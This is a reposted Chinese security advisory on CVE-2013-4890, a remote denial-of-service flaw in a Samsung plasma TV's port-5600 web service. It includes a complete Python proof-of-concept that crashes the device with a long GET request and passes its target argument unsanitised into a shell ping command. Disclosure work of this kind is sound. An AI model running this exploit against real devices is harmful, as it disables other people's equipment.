Samsung PS50C7700 3D Plasma

发布日期:2013-07-21
更新日期:2013-07-25

受影响系统:
Samsung PS50C7700 3D Plasma-TV
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 61391
CVE(CAN) ID: CVE-2013-4890

Samsung PS50C7700 3D Plasma-TV是款等离子电视。

Samsung PS50C7700 3D Plasma-TV存在远程拒绝服务漏洞,攻击者通过发送超长的HTTP GET请求利用此漏洞,造成端口TCP 5600上的Web服务(DMCRUIS/0.1)崩溃,导致拒绝服务。

<*来源:Malik Mesellem
 
  链接:
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/python

#Author: Malik Mesellem - @MME_IT -
#Exploit: Denial of Service (DoS) attack
#Description: Resets some Samsung TVs
#The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request
#Tested successfully on my Samsung PS50C7700 plasma TV :)

import httplib
import sys
import os

print "  ***************************************************************************************"
print "  Author: Malik Mesellem - @MME_IT - \n"
print "  Exploit: Denial of Service (DoS) attack\n"
print "  Description: Resets some Samsung TVs\n"
print "    The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request."
print "    Tested successfully on my Samsung PS50C7700 plasma TV :)\n"
print "  ***************************************************************************************\n"

#Sends the payload
print "  Sending the malicious payload...\n"
conn = httplib.HTTPConnection(sys.argv[1],5600)
conn.request("GET", "A"*300)
conn.close()

#Checks the response
print "  Checking the status... (CTRL+Z to stop)\n"
response = 0
while response == 0:
  response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1")
  if response != 0:
    print "  Target down!\n"

建议:
--------------------------------------------------------------------------------
厂商补丁:

Samsung
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/pfpxj.html